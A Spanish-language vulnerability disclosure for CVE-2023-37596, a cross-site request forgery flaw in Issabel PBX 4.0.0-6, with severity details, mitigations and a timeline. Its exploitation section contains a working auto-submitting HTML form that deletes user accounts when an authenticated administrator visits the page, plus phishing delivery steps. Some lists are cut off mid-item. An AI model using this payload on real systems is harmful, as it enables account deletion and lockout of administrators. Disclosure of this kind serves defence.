
CVE-2023-37596 es una vulnerabilidad de Cross-Site Request Forgery (CSRF) descubierta en Issabel PBX versión 4.0.0-6, una plataforma de Comunicaciones Unificadas de código abierto ampliamente utilizada.
Severidad: Alta | CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H) | CWE: CWE-352
Se descubrió una vulnerabilidad de Cross-Site Request Forgery (CSRF) en Issabel PBX versión 4.0.0-6. El endpoint de gestión de usuarios no implementa ninguna protección CSRF, lo que permite a un atacante remoto no autenticado crear una página web maliciosa que — al ser visitada por un administrador de Issabel autenticado — elimine silenciosamente cualquier cuenta de usuario del sistema. La explotación repetida puede volver toda la aplicación inaccesible al eliminar todos los usuarios administrativos.
Debido a que Issabel PBX no valida el origen de las solicitudes que cambian el estado en su interfaz de gestión de usuarios, un ataque CSRF exitoso permite a un atacante:
| Producto | Versión Afectada | Estado |
|---|---|---|
| issabel-pbx | 4.0.0-6 | Vulnerable |
Un atacante aloja una página HTML maliciosa que contiene una solicitud HTTP falsificada dirigida al endpoint de eliminación de usuarios de la aplicación Issabel PBX. El ataque se desencadena automáticamente (o al hacer clic en un botón) cuando un usuario que ya está autenticado en Issabel visita la página maliciosa en el mismo navegador. Debido a que el navegador incluye automáticamente las cookies de sesión de la víctima en cada solicitud, el servidor acepta la solicitud de eliminación falsificada como legítima.
No se requieren privilegios especiales por parte del atacante — solo un vector de ingeniería social (enlace de phishing, anuncio malicioso, etc.) para atraer al administrador autenticado a la página creada.
Características clave de este ataque:
id=1, id=2, …) puede ser objetivo modificando el payload.Navegue a la página de lista de usuarios de Issabel PBX e identifíquese con credenciales de administrador:
https://<Issabel-IP>/index.php?menu=userlist


Burp Suite producirá una página HTML similar a la siguiente. Guárdela como un archivo .html (por ejemplo, csrf_exploit.html):
<html>
<!-- CSRF PoC - generado por Burp Suite Professional -->
<body>
<form action="https://<Issabel-IP>/index.php?menu=userlist" method="POST">
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="id" value="1" />
<input type="submit" value="Enviar solicitud" />
</form>
<script>
// Auto-enviar el formulario tan pronto como la página cargue
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Nota: Reemplace
<Issabel-IP>con la dirección IP o nombre de host del servidor objetivo, y ajuste el valor deidpara dirigirse a una cuenta de usuario diferente.
Envíe el archivo csrf_exploit.html (o un enlace a donde esté alojado) a un usuario que se encuentre actualmente conectado a Issabel PBX. Cuando la víctima abra la página, el formulario se enviará automáticamente y el usuario objetivo será eliminado sin ninguna solicitud de confirmación.


Las siguientes defensas deberían ser aplicadas por el proveedor y/o por los administradores del sistema para corregir esta vulnerabilidad:
Implementar Tokens CSRF — Generar un token criptográficamente aleatorio, por sesión (o por solicitud) y validarlo del lado del servidor para cada solicitud que cambie el estado. Las solicitudes que no incluyan un token válido deben ser rechazadas.
Atributo de Cookie SameSite — Establecer el atributo SameSite de la cookie de sesión en Strict o Lax para evitar que las solicitudes de origen cruzado envíen la cookie de sesión en la mayoría de los navegadores.
Verificar el Encabezado Origin / Referer — En el lado del servidor, rechazar cualquier solicitud que cambie el estado cuyo encabezado Origin o Referer no coincida con el dominio de la aplicación.
Requerir Re-autenticación para Acciones Destructivas — Solicitar al usuario que vuelva a ingresar su contraseña antes de procesar acciones irreversibles como la eliminación de cuentas de usuario.
Aplicar el Principio de Menor Privilegio — Asegurar que solo los usuarios con un rol de administrador explícito puedan acceder a la funcionalidad de eliminación de usuarios, reduciendo el radio de explosión de un ataque exitoso.
Hasta que haya un parche del proveedor, se recomienda a los administradores:
| Fecha | Evento |
|---|---|
| 10/07/2023 | Vulnerabilidad descubierta y reportada |
| 10/07/2023 | CVE-2023-37596 asignado |
Sahil Ojha
Descargo de responsabilidad: Este repositorio se publica únicamente con fines educativos y de divulgación responsable. La información aquí proporcionada no debe ser utilizada para atacar sistemas sin el permiso explícito por escrito del propietario del sistema. El autor no asume ninguna responsabilidad por el mal uso de esta información.
| Campo | Valor |
|---|
| ID CVE | CVE-2023-37596 |
| Tipo de Vulnerabilidad | Cross-Site Request Forgery (CSRF) |
| CWE | CWE-352 |
| Producto | Issabel PBX |
| Versión Vulnerable | 4.0.0-6 |
| Página del Proveedor | https://www.issabel.org/ |
| Repositorio del Software | https://github.com/IssabelFoundation/issabelPBX |
| Probado en | Windows |
| CVE Publicado | 10/07/2023 |
| Descubierto por | Sahil Ojha |